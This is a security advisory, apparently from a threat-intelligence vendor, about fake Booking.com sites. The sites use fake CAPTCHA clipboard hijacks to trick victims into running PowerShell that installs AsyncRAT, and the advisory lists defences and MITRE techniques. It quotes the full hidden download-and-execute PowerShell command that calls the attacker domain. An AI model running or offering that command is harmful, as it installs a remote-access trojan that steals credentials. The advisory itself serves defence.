Fake Booking[.]com Sites Deliver AsyncRAT

Published Date: June 4, 2025
Category: ShadowOpsIntel
Share:

A recent malware campaign uncovered by Malwarebytes involves users being redirected from gaming platforms and social media to fake Booking.com clones, ultimately leading to infection with AsyncRAT – a potent Remote Access Trojan. These malicious redirection links are embedded in ads and deceptive CAPTCHA forms, exploiting user trust to trick victims into executing PowerShell commands that download and install the malware.

Severity Level: High

Threat Details

1. Attack Vector:

  • Victims are lured through sponsored ads, gaming sites, and social media posts.
  • Redirected to fake Booking[.]com clones.
  • Presented with a CAPTCHA prompt.
  • Clicking the CAPTCHA causes a malicious PowerShell command to be copied to the clipboard.
  • Instructions prompt victims to paste the command into the Windows Run dialog, triggering malware installation.

2. Payload Execution:

powershell -NoProfile -WindowStyle Hidden -Command “$banp = ‘bkngnet[.]com’; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv”
This downloads ckjg.exe, which installs Stub.exe

3. Malware Functionality – AsyncRAT:

  • Remote desktop and keylogging
  • Credential theft
  • File execution and exfiltration
  • Persistence and evasion

    Recommendations:

    1. Use an active anti-malware solution that blocks malicious websites and scripts.
    2. Use a browser extension that blocks malicious domains and scams.
    3. Disable JavaScript by default in untrusted contexts to prevent clipboard hijacks via document.execCommand(‘copy’).
    4. Enforce policies via Group Policy to disable or restrict powershell.exe and pwsh.exe for standard users.
    5. Educate users on:
      • Recognizing fake CAPTCHA prompts that ask for system-level actions.
      • The risks of copying/pasting commands from unknown websites.
      • Red flags in travel booking scenarios (e.g., unusual domains, poor design, unexpected redirects).
    6. Use application allowlisting (e.g., Microsoft AppLocker or WDAC) to prevent execution of unauthorized EXEs like Stub.exe.
    7. Restrict access to the Windows Run dialog for standard users.
    8. Enable detailed PowerShell logging (Event ID 4104) and monitor for: use of Invoke-RestMethod, Invoke-Expression, or obfuscated strings.
    9. Block the IOCs at their respective controls
      https://www.virustotal.com/gui/collection/6ffdf218e2d97b362919744b90ab6651a2029969ace685585774616cf452a3ee/iocs

    MITRE ATT&CK

    TacticTechniqueID
    Initial AccessDrive-by CompromiseT1189
    ExecutionCommand and Scripting Interpreter: PowerShellT1059.001
    ExecutionUser Execution: Malicious LinkT1204.001
    Defense EvasionObfuscated Files or InformationT1027
    Defense EvasionMasqueradingT1036
    Command and Control (C2)Application Layer Protocol: Web ProtocolsT1071.001
    Command and Control (C2)Remote Access SoftwareT1219
    Credential AccessInput Capture: KeyloggingT1056.001
    CollectionClipboard DataT1115

    Source:

    • https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites

    Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

    No related posts found.

    Ampcus Cyber
    Privacy Overview

    This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.